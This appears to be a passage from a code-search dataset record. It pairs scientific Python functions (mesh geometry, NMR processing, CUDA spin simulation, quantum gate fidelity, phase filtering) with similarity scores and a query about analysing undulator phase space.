-1.0*0.5*yb*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5*(-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*0.5*yb*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5*(-zb+2.0*xx*zb/3.0)\n dzdxi1 = -1.0*0.5*zb*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5*(-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0) \n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[3].vals = negYvals\n mesh.eList[3].normals = negYnormals\n mesh.eList[3].J = negYJ\n \n # z=+1 side\n def posZvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1)\n yb=np.array(-xi2)\n zb=np.ones(xi1.shape)\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def posZnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(-xi2);zb=np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = -1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = -1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = -1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def posZJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(-xi2);zb=np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = -1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = -1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = -1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[4].vals = posZvals\n mesh.eList[4].normals = posZnormals\n mesh.eList[4].J = posZJ\n \n # z=-1 side\n def negZvals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(xi2);zb=-np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n x = xb*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n y = yb*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n z = zb*np.sqrt(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)\n return np.vstack([x,y,z])\n def negZnormals(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(xi2);zb=-np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n magnitude = np.sqrt(np.sum(J**2,axis=1))\n return J.T/magnitude\n def negZJ(xi1,xi2):\n xi1=np.asarray(xi1,np.float).reshape(-1,)\n xi2=np.asarray(xi2,np.float).reshape(-1,)\n xb=np.array(xi1);yb=np.array(xi2);zb=-np.ones(xi1.shape);\n xx=xb**2;yy=yb**2;zz=zb**2;\n dxdxi1 = 1.0*np.sqrt(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)\n dxdxi2 = 1.0*xb*0.5*(1.0 - yy/2.0 - zz/2.0 + yy*zz/3.0)**-0.5 * (-yb+2.0*yb*zz/3.0)\n dydxi1 = 1.0*yb*0.5*(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)**-0.5 * (-xb+2.0*xb*zz/3.0)\n dydxi2 = 1.0*np.sqrt(1.0 - xx/2.0 - zz/2.0 + xx*zz/3.0)\n dzdxi1 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-xb+2.0*xb*yy/3.0)\n dzdxi2 = 1.0*zb*0.5*(1.0 - xx/2.0 - yy/2.0 + xx*yy/3.0)**-0.5 * (-yb+2.0*xx*yb/3.0)\n J = np.array([[dxdxi1,dxdxi2],[dydxi1,dydxi2],[dzdxi1,dzdxi2]]).T\n J = np.cross(J[:,0,:],J[:,1,:])\n return np.sqrt(np.sum(J**2,axis=1))\n mesh.eList[5].vals = negZvals\n mesh.eList[5].normals = negZnormals\n mesh.eList[5].J = negZJ\n \n for e in mesh.eList:\n e.ExactElement = True\n \n return mesh", "def proz(): \r\n print(\"processing: \",CURDATA()[0]) \r\n Check_180turn(left_boundary,right_boundary)\r\n EF() #exponential window multiplication + fourier\r\n APK0() #1. Phase correction 0th Ordnung\r\n APK1() #1. Phase correction 1st Ordnung\r\n ABS() #Baseline correction\r\n APK()\r\n ABS() #Baseline correction\r\n Check_180turn(left_boundary,right_boundary)", "def cuda_step_plane(positions, g_x, g_y, g_z, phases, rng_states, time_point, n_of_spins, gamma, step_length, dt, directions):\n \n # Global thread index on a 1D grid\n thread_id = cuda.grid(1)\n if thread_id >= n_of_spins:\n return\n\n # Allocate local memory\n step = cuda.local.array(3, numba.double)\n\n # Generate random step\n phi = xoroshiro128p_uniform_float64(rng_states, thread_id) * 6.283185307179586\n step[0] = math.cos(phi) * directions[0] + math.sin(phi) * directions[3]\n step[1] = math.cos(phi) * directions[1] + math.sin(phi) * directions[4]\n step[2] = math.cos(phi) * directions[2] + math.sin(phi) * directions[5]\n step[0] = step_length * step[0]\n step[1] = step_length * step[1]\n step[2] = step_length * step[2]\n\n # Update positions\n positions[0, thread_id] = positions[0, thread_id] + step[0]\n positions[1, thread_id] = positions[1, thread_id] + step[1]\n positions[2, thread_id] = positions[2, thread_id] + step[2]\n \n # Calculate phase shift\n for measurement in range(g_x.shape[1]):\n phases[measurement, thread_id] += gamma * dt * \\\n (g_x[time_point, measurement] * positions[0, thread_id] + \\\n g_y[time_point, measurement] * positions[1, thread_id] + \\\n g_z[time_point, measurement] * positions[2, thread_id])", "def phase(self):\n return np.arctan(np.sum(np.imag(self.values)) / np.sum(np.real(self.values)))", "def get_phases(t,P,t0):\n if type(t) is not float:\n phase = ((t - np.median(t0))/np.median(P)) % 1\n ii = np.where(phase>=0.5)[0]\n phase[ii] = phase[ii]-1.0\n else: \n phase = ((t - np.median(t0))/np.median(P)) % 1\n if phase>=0.5:\n phase = phase - 1.0\n return phase", "def F_trans(self):\n common_scale = self.edp_par['common_scale'].value\n R_HM = self.edp_par['R_HM'].value\n X_h = self.edp_par['X_h'].value\n psi = self.edp_par['psi'].value \n arg = self.qz*X_h*np.cos(psi) - self.qx*X_h*np.sin(psi)\n return common_scale * (R_HM*np.cos(arg) - 1)", "def prob4(d = 500): \n #import the plane data\n planeData = np.load(\"plane.npy\")\n \n tplane = planeData[:,0]\n alpha = np.deg2rad(planeData[:,1])\n beta = np.deg2rad(planeData[:,2])\n \n l = len(tplane)\n \n #define x and y functions\n def x(n):\n# Gives x position\n return d * np.tan(beta[n]) / (np.tan(beta[n]) - np.tan(alpha[n]))\n def y(n):\n# Gives y position\n return d * np.tan(beta[n]) * np.tan(alpha[n]) / (np.tan(beta[n]) - np.tan(alpha[n]))\n \n #define x and y prime as we will see them\n def xprime(n):\n# Gives the approximate derivative of x\n if n == 0:\n return fdq1(x, n, h = 1)\n elif n == l-1:\n return bdq1(x, n, h = 1)\n elif n > 0 and n < l:\n return cdq2(x, n, h = 1)\n else:\n return 0\n \n def yprime(n):\n# Gives the approximate derivative of y\n if n == 0:\n return fdq1(y, n, h = 1)\n elif n == l-1:\n return bdq1(y, n, h = 1)\n elif n > 0 and n < l:\n return cdq2(y, n, h = 1)\n else:\n return 0\n \n #define speed from x and y prime\n def speed(n):\n# print(\"speed(n) where n = \" + str(n))\n return np.sqrt((xprime(n))**2 + (yprime(n))**2)\n \n #Finally get the speed from the information we have\n spd = []\n X = []\n Y = []\n for i in range(0, l):\n spd.append(speed(i))\n X.append(x(i))\n Y.append(y(i))\n \n return spd\n \n raise NotImplementedError(\"Problem 4 Incomplete\")", "def parse_phase (self, ph):\n\n l = ph.split ()\n dist = l[0] # in degrees\n name = l[2]\n time = l[3]\n\n #print (time)\n\n return [name, time, dist]", "def _apply_array_spin1234(self, h1e: 'Nparray', h2e: 'Nparray',\n h3e: 'Nparray', h4e: 'Nparray') -> 'Nparray':\n norb = self.norb()\n tno = 2 * norb\n assert h4e.shape == (tno, tno, tno, tno, tno, tno, tno, tno)\n lena = self.lena()\n lenb = self.lenb()\n\n nh1e = numpy.copy(h1e)\n nh2e = numpy.copy(h2e)\n nh3e = numpy.copy(h3e)\n\n if fqe.settings.use_accelerated_code:\n _make_nh123(norb, h4e, nh1e, nh2e, nh3e)\n else:\n for i in range(norb * 2):\n for j in range(norb * 2):\n for k in range(norb * 2):\n nh1e[:, :] -= h4e[:, j, i, k, j, i, k, :]\n for l in range(norb * 2):\n nh2e[i, j, :, :] += (h4e[j, l, i, k, l, k, :, :] +\n h4e[i, j, l, k, l, k, :, :] +\n h4e[i, l, k, j, l, k, :, :] +\n h4e[j, i, k, l, l, k, :, :] +\n h4e[i, k, j, l, k, :, l, :] +\n h4e[j, i, k, l, k, :, l, :] +\n h4e[i, j, k, l, :, k, l, :])\n nh3e[i, j, k, :, :, :] += (\n h4e[k, i, j, l, l, :, :, :] +\n h4e[j, i, l, k, l, :, :, :] +\n h4e[i, l, j, k, l, :, :, :] +\n h4e[i, k, j, l, :, l, :, :] +\n h4e[i, j, l, k, :, l, :, :] +\n h4e[i, j, k, l, :, :, l, :])\n\n (dveca, dvecb) = self.calculate_dvec_spin()\n evecaa = numpy.zeros((norb, norb, norb, norb, lena, lenb),\n dtype=self._dtype)\n evecab = numpy.zeros((norb, norb, norb, norb, lena, lenb),\n dtype=self._dtype)\n evecba = numpy.zeros((norb, norb, norb, norb, lena, lenb),\n dtype=self._dtype)\n evecbb = numpy.zeros((norb, norb, norb, norb, lena, lenb),\n dtype=self._dtype)\n for i in range(norb):\n for j in range(norb):\n tmp = self._calculate_dvec_spin_with_coeff(dveca[i, j, :, :])\n evecaa[:, :, i, j, :, :] = tmp[0][:, :, :, :]\n evecba[:, :, i, j, :, :] = tmp[1][:, :, :, :]\n\n tmp = self._calculate_dvec_spin_with_coeff(dvecb[i, j, :, :])\n evecab[:, :, i, j, :, :] = tmp[0][:, :, :, :]\n evecbb[:, :, i, j, :, :] = tmp[1][:, :, :, :]\n\n out = self._apply_array_spin123(nh1e, nh2e, nh3e, (dveca, dvecb),\n (evecaa, evecab, evecba, evecbb))\n\n def ncon(A, B):\n \"\"\"Tensor contraction and transposition corresponding with\n einsum 'ikmojlnp,mnopxy->ijklxy'\n \"\"\"\n return numpy.transpose(numpy.tensordot(A,\n B,\n axes=((2, 6, 3, 7), (0, 1, 2,\n 3))),\n axes=(0, 2, 1, 3, 4, 5))\n\n n = norb # shorter\n nevecaa = ncon(h4e[:n, :n, :n, :n, :n, :n, :n, :n], evecaa) \\\n + 2.0 * ncon(h4e[:n, :n, :n, n:, :n, :n, :n, n:], evecab) \\\n + ncon(h4e[:n, :n, n:, n:, :n, :n, n:, n:], evecbb)\n\n nevecab = ncon(h4e[:n, n:, :n, :n, :n, n:, :n, :n], evecaa) \\\n + 2.0 * ncon(h4e[:n, n:, :n, n:, :n, n:, :n, n:], evecab) \\\n + ncon(h4e[:n, n:, n:, n:, :n, n:, n:, n:], evecbb)\n\n nevecbb = ncon(h4e[n:, n:, :n, :n, n:, n:, :n, :n], evecaa) \\\n + 2.0 * ncon(h4e[n:, n:, :n, n:, n:, n:, :n, n:], evecab) \\\n + ncon(h4e[n:, n:, n:, n:, n:, n:, n:, n:], evecbb)\n\n dveca2 = numpy.zeros(dveca.shape, dtype=self._dtype)\n dvecb2 = numpy.zeros(dvecb.shape, dtype=self._dtype)\n for i in range(norb):\n for j in range(norb):\n dveca[:, :, :, :] = nevecaa[i, j, :, :, :, :]\n dvecb[:, :, :, :] = nevecab[i, j, :, :, :, :]\n cvec = self._calculate_coeff_spin_with_dvec((dveca, dvecb))\n dveca2[i, j, :, :] += cvec[:, :]\n\n dveca[:, :, :, :] = nevecab[:, :, i, j, :, :]\n dvecb[:, :, :, :] = nevecbb[i, j, :, :, :, :]\n cvec = self._calculate_coeff_spin_with_dvec((dveca, dvecb))\n dvecb2[i, j, :, :] += cvec[:, :]\n\n out += self._calculate_coeff_spin_with_dvec((dveca2, dvecb2))\n return out", "def _like4(init_par, alpha, delta, plx_obs, mualpha_obs, mudelta_obs, vrad_obs, sigma_obs, sigma_vrad, ccoef, i):\r\n\t\r\n\tplx_mod, v, sigma_v = init_par[i], init_par[-4:-1], init_par[-1] \r\n\tp, q, r = normalTriad(alpha, delta)\r\n\tmualpha_mod = np.dot(np.transpose(p),v)*plx_mod/_A ### [mas/yr]\r\n\tmudelta_mod = np.dot(np.transpose(q),v)*plx_mod/_A ### [mas/yr]\r\n\t### Add the model vector for the radial velocities:\r\n\tvrad_mod = np.dot(np.transpose(r),v) ### [km/s]\r\n \t\r\n\tsigma_plx, sigma_mualpha, sigma_mudelta = np.transpose(sigma_obs)\r\n\tC = np.zeros((4,4),dtype=np.float64) ### This is a 4x4 matrix \r\n\t### Diagonal terms:\r\n\tC[0,0],C[1,1],C[2,2] = sigma_plx**2.,sigma_mualpha**2., sigma_mudelta**2.\r\n\tC[3,3] = sigma_vrad**2.\r\n\t\r\n\tr_plx_muRa, r_plx_muDec, r_muRa_muDec = ccoef[0], ccoef[1], ccoef[2] \r\n \r\n\t### Correlation terms:\r\n\tC[0,1], C[0,2] = r_plx_muRa*sigma_plx*sigma_mualpha, r_plx_muDec*sigma_plx*sigma_mudelta\r\n\tC[1,0], C[1,2] = r_plx_muRa*sigma_plx*sigma_mualpha, r_muRa_muDec*sigma_mualpha*sigma_mudelta\r\n\tC[2,0], C[2,1] = r_plx_muDec*sigma_plx*sigma_mudelta, r_muRa_muDec*sigma_mualpha*sigma_mudelta\r\n\r\n\tE = np.zeros((4,4),dtype=np.float64) ### 4x4 matrix \r\n\tE[1,1],E[2,2] = (sigma_v**2.)*(plx_mod/_A)**2., (sigma_v**2.)*(plx_mod/_A)**2. ### [mas/yr]\r\n\tE[3,3] = sigma_v**2.\t\t\t\t\t\t\t\t ### [km/s]\r\n\r\n\t\r\n\tD = np.add(E,C)\r\n\tdetD = det(D) \r\n\tinvD = inv(D)\r\n\t\t\r\n\ta_c = np.array([plx_obs - plx_mod, mualpha_obs - mualpha_mod, mudelta_obs-mudelta_mod, vrad_obs - vrad_mod])\r\n\tg_func = row_matrix_col_4d(a_c, a_c, invD) \r\n\t\r\n\t\r\n\treturn detD, g_func", "def pro_avfid_superoperator_phasecorrected(U,phases):\n Ucorrection = qtp.Qobj([[np.exp(-1j*np.deg2rad(phases[0])), 0, 0, 0, 0, 0, 0, 0, 0],\n [0, np.exp(-1j*np.deg2rad(phases[1])), 0, 0, 0, 0, 0, 0, 0],\n [0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1])), 0, 0, 0, 0, 0, 0],\n [0, 0, 0, np.exp(-1j*np.deg2rad(phases[2])), 0, 0, 0, 0, 0],\n [0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[3]-phases[-1])), 0, 0, 0, 0],\n [0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1]+phases[2]-phases[0])), 0, 0, 0],\n [0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[5])), 0, 0],\n [0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[5]+phases[1]-phases[0])), 0],\n [0, 0, 0, 0, 0, 0, 0, 0, np.exp(-1j*np.deg2rad(phases[4]-phases[-1]+phases[5]-phases[0]))]],\n type='oper',\n dims=[[3, 3], [3, 3]])\n\n if U.type=='oper':\n U=Ucorrection*U\n ptrace = np.abs((U.dag()*U_target).tr())**2\n dim = 9 # dimension of the whole space\n return np.real((ptrace+dim)/(dim*(dim+1)))\n\n elif U.type=='super':\n U=qtp.to_super(Ucorrection)*U\n return np.real(qtp.average_gate_fidelity(U,target=U_target_diffdims))", "def getRFFieldMap(self, phase=0):\n # TODO: we might want to see something else for a multi-cell cavity\n return np.sum([norm_E(self.z_array) * self.rf_peak_field * 1e6 * np.cos(pho + phase)\n for norm_E, pho in zip(self.norm_E, self.phase_offset)], 0)", "def filter_wrapped_phase(image, k):\n ny, nx = image.shape\n assert(ny == nx) ## assert a square image for simplicity\n if (k%2 == 0):\n print(\"k has to be an integer!\")\n return\n N = nx\n i, j = np.arange(N), np.arange(N)\n ii, jj = np.meshgrid(i, j)\n filt_psi = np.zeros((N,N))\n\n inside = (jj[k/2:N-(k/2), k/2:N-(k/2)].flatten(), ii[k/2:N-(k/2), k/2:N-(k/2)].flatten())\n krange = np.linspace(-1 * (k/2), (k/2), k, dtype = 'int64') ## amount of added spaces, if k = 5, it ranges from -2 to 2\n krange_tile = np.tile(krange * N, (k, 1)).T ## tile them to make a (k/2)**2 matrix, containing for instance -2N, -N, 0, N, 2N for k=5\n k_tile = np.tile(krange, (k, 1)) ## tile to add to krange_tile\n coords_add = (krange_tile + k_tile).flatten() ## all coordinates, in a (k/2)**2 matrix, from -2N - 2: -2N + 2, -N-2 : -N+2 , -2 : 2, N -2 : N +2, 2N -2 : 2N +2\n inside = np.ravel_multi_index(inside, (N, N))\n coords_add = np.tile(coords_add, (len(inside), 1)) ## stack all differences to add to inside\n inside_tile = np.tile(inside, (coords_add.shape[1],1)).T ## stack all inside to add to differences\n all_coords = inside_tile + coords_add### a matrix of len(inside) x (k/2)**2 with all coordinates in a k x k square around a certain coordinate\n unrav_coords = np.unravel_index(all_coords, (N, N)) ## unraveled coordinates of all coordinates\n sum_sin_psi = np.sum(np.sin(image[unrav_coords]), axis = 1) ## sum over a sin (psi) over a k x k square\n sum_cos_psi = np.sum(np.cos(image[unrav_coords]), axis = 1) ## sum over a cos (psi) over a k x k square\n psi_app = np.arctan2(sum_sin_psi, sum_cos_psi)\n filt_psi[np.unravel_index(inside, (N, N))] = psi_app \n\n #### top layers\n for i in range(k/2):\n ## for indices directly above the \"inside square\"\n top = (jj[i, k/2:N-(k/2)].flatten(), ii[i, k/2: N - (k/2)].flatten())\n coords_add = (krange_tile + k_tile)[(k/2)-i:, :].flatten()\n top = np.ravel_multi_index(top, (N, N))\n coords_add = np.tile(coords_add, (len(top), 1))\n top_tile = np.tile(top, (coords_add.shape[1],1)).T\n top_coords = top_tile + coords_add\n unrav_coords = np.unravel_index(top_coords, (N, N))\n sum_sin_top = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_top = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_top = np.arctan2(sum_sin_top, sum_cos_top)\n filt_psi[np.unravel_index(top, (N, N))] = psi_top\n\n ## indices directly below the \"inside square\"\n bot = (jj[N- 1 - i, k/2:N-(k/2)].flatten(), ii[N-1-i, k/2: N - (k/2)].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:(k/2) + 1 + i, :].flatten()\n bot = np.ravel_multi_index(bot, (N, N))\n coords_add = np.tile(coords_add, (len(top), 1))\n bot_tile = np.tile(bot, (coords_add.shape[1],1)).T\n bot_coords = bot_tile + coords_add\n unrav_coords = np.unravel_index(bot_coords, (N, N))\n sum_sin_bot = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_bot = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_bot = np.arctan2(sum_sin_bot, sum_cos_bot)\n filt_psi[np.unravel_index(bot, (N, N))] = psi_bot\n\n ## indices directly left of the \"inside square\"\n left = (jj[k/2:N-(k/2), i].flatten(), ii[k/2:N-(k/2), i].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:, (k/2)-i:].flatten()\n left = np.ravel_multi_index(left, (N, N))\n coords_add = np.tile(coords_add, (len(left), 1))\n left_tile = np.tile(left, (coords_add.shape[1],1)).T\n left_coords = left_tile + coords_add\n unrav_coords = np.unravel_index(left_coords, (N, N))\n sum_sin_left = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_left = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_left = np.arctan2(sum_sin_left, sum_cos_left)\n filt_psi[np.unravel_index(left, (N, N))] = psi_left\n\n ## indices directly left of the \"inside square\"\n right = (jj[k/2:N-(k/2), N - 1 - i].flatten(), ii[k/2:N-(k/2), N - 1 - i].flatten()) ## starting at the bottom working inwards\n coords_add = (krange_tile + k_tile)[:, :(k/2)+1+i].flatten()\n right = np.ravel_multi_index(right, (N, N))\n coords_add = np.tile(coords_add, (len(right), 1))\n right_tile = np.tile(right, (coords_add.shape[1],1)).T\n right_coords = right_tile + coords_add\n unrav_coords = np.unravel_index(right_coords, (N, N))\n sum_sin_right = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_right = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_right = np.arctan2(sum_sin_right, sum_cos_right)\n filt_psi[np.unravel_index(right, (N, N))] = psi_right\n \n ## calculate boundaries diagonals\n left_t, right_t, left_b, right_b = (i, i), (i, -1 -i), (-1 - i, i), (-1 - i, -1 - i) \n left_t, right_t, left_b, right_b = (jj[left_t], ii[left_t]), (jj[right_t], ii[right_t]), (jj[left_b], ii[left_b]), (jj[right_b], ii[right_b])\n left_t, right_t, left_b, right_b = np.ravel_multi_index(left_t, (N, N)), np.ravel_multi_index(right_t, (N, N)), np.ravel_multi_index(left_b, (N, N)), np.ravel_multi_index(right_b, (N, N))\n coord_mat = krange_tile + k_tile\n coords_add_lt, coords_add_rt, coords_add_lb, coords_add_rb = coord_mat[(k/2)-i:, (k/2)-i:].flatten(), coord_mat[(k/2)-i:, :(k/2)+1+i].flatten(), coord_mat[:(k/2)+i+1, (k/2)-i:].flatten(), coord_mat[:(k/2)+i+1, :(k/2)+i+1].flatten()\n coords_add_tot = np.vstack((coords_add_lt, coords_add_rt, coords_add_lb, coords_add_rb))\n lt_tile, rt_tile, lb_tile, rb_tile = np.tile(left_t, (coords_add_lt.shape[0],1)).T, np.tile(right_t, (coords_add_lt.shape[0],1)).T, np.tile(left_b, (coords_add_lt.shape[0],1)).T, np.tile(right_b, (coords_add_lt.shape[0],1)).T\n coords_tile_tot = np.squeeze(np.stack((lt_tile, rt_tile, lb_tile, rb_tile)))\n coords_tot = coords_add_tot + coords_tile_tot\n unrav_coords = np.unravel_index(coords_tot, (N, N))\n sum_sin_diag = np.sum(np.sin(image[unrav_coords]), axis = 1)\n sum_cos_diag = np.sum(np.cos(image[unrav_coords]), axis = 1)\n psi_diag = np.arctan(sum_sin_diag, sum_cos_diag)\n filt_psi[np.unravel_index(np.stack((left_t, right_t, left_b, right_b)), (N, N))] = psi_diag\n\n return filt_psi", "def test_normalized_beamsplitter_output(self, setup_backend, t, r_phi, tol):\n\n backend = setup_backend(2)\n\n backend.displacement(ALPHA, np.pi / 3, 1)\n backend.beamsplitter(np.arccos(t), r_phi, 0, 1)\n state = backend.state()\n tr = state.trace()\n assert np.allclose(tr, 1, atol=tol, rtol=0)" ]
[ "0.6671196", "0.64827406", "0.6373965", "0.6372035", "0.6084464", "0.60772616", "0.6052406", "0.59829885", "0.5869289", "0.5851694", "0.580842", "0.58041", "0.5711219", "0.5682935", "0.5637525", "0.5630165", "0.5624642", "0.56207854", "0.5617892", "0.5615495", "0.5611847", "0.56065875", "0.5606309", "0.55991685", "0.5598589", "0.557845", "0.5576333", "0.5569804", "0.55685985", "0.5544888", "0.5541166", "0.55364704", "0.55224335", "0.551738", "0.54781574", "0.54571337", "0.5452817", "0.5450786", "0.54360205", "0.5427854", "0.5387737", "0.5377662", "0.5377316", "0.5372418", "0.5369332", "0.5369174", "0.5365837", "0.535905", "0.5358913", "0.5347659", "0.53451294", "0.5344258", "0.5344094", "0.5341308", "0.53387314", "0.5331643", "0.53229576", "0.53229576", "0.5321171", "0.5320759", "0.5315379", "0.531526", "0.53146046", "0.5312059", "0.53095746", "0.5309008", "0.5308353", "0.52910733", "0.52830744", "0.5280103", "0.526952", "0.5262084", "0.52562696", "0.5254502", "0.525405", "0.5249117", "0.5241375", "0.5232895", "0.5229758", "0.52274513", "0.5219376", "0.5207444", "0.5199935", "0.5198852", "0.5183357", "0.51806587", "0.5180325", "0.5176328", "0.5174787", "0.51689255", "0.5167113", "0.5166428", "0.5165783", "0.51633334", "0.51584476", "0.5155426", "0.5154421", "0.5154059", "0.5149019", "0.51459175" ]
0.6127306
4
We want to use this function to analyze which part is on the axis in each undulator section.
def analyze_on_axis(phase_space, id_begin, id_end, ds_slice, zplot): ps = phase_space[:, (id_begin-1):id_end, :] # print(np.shape(ps)) # ps = ps[numpy.logical_not(numpy.isnan(ps))] x = ps[0, :, :] px = ps[1, :, :] y = ps[2, :, :] py = ps[3, :, :] id_on_axis = np.zeros((4, int(id_end-id_begin+1))) for n in range(int(id_end-id_begin+1)): x_this = x[n, :] px_this = px[n, :] y_this = y[n, :] py_this = py[n, :] # Remove all NAN elements in the phase space array x_this = x_this[np.logical_not(np.isnan(x_this))] px_this = px_this[np.logical_not(np.isnan(px_this))] y_this = y_this[np.logical_not(np.isnan(y_this))] py_this = py_this[np.logical_not(np.isnan(py_this))] ## Plot X plt.subplot(2, 2, 1) plt.plot(zplot[0:len(x_this)]*1e+6, x_this*1e+6) plt.ylabel('Position in X/ $\mu$m', fontsize=10) ## Plot Y plt.subplot(2, 2, 2) plt.plot(zplot[0:len(y_this)]*1e+6, y_this*1e+6) plt.ylabel('Position in Y/ $\mu$m', fontsize=10) ## Plot px plt.subplot(2, 2, 3) plt.plot(zplot[0:len(px_this)]*1e+6, px_this) plt.ylabel('Angle in X', fontsize=10) ## Plot py plt.subplot(2, 2, 4) plt.plot(zplot[0:len(py_this)]*1e+6, py_this) plt.ylabel('Angle in Y', fontsize=10) # plt.xlabel('Longitudianl Direction of the Bunch $s$/ $\mu$m') # plt.title('First Undulator Section') # plt.title('Second Undulator Section') # plt.title('Third Undulator Section') id_on_axis[0, n] = np.argmin(np.abs(x_this)) id_on_axis[1, n] = np.argmin(np.abs(px_this)) id_on_axis[2, n] = np.argmin(np.abs(y_this)) id_on_axis[3, n] = np.argmin(np.abs(py_this)) fig = plt.gcf() fig.set_size_inches(13.5, 9) ax = plt.gca() ax.yaxis.get_major_formatter().set_powerlimits((0,1)) fig.savefig('phase_space_U3_new.png', dpi=100) plt.show() s_on_axis = np.average(id_on_axis[2:4,:])*ds_slice return id_on_axis, 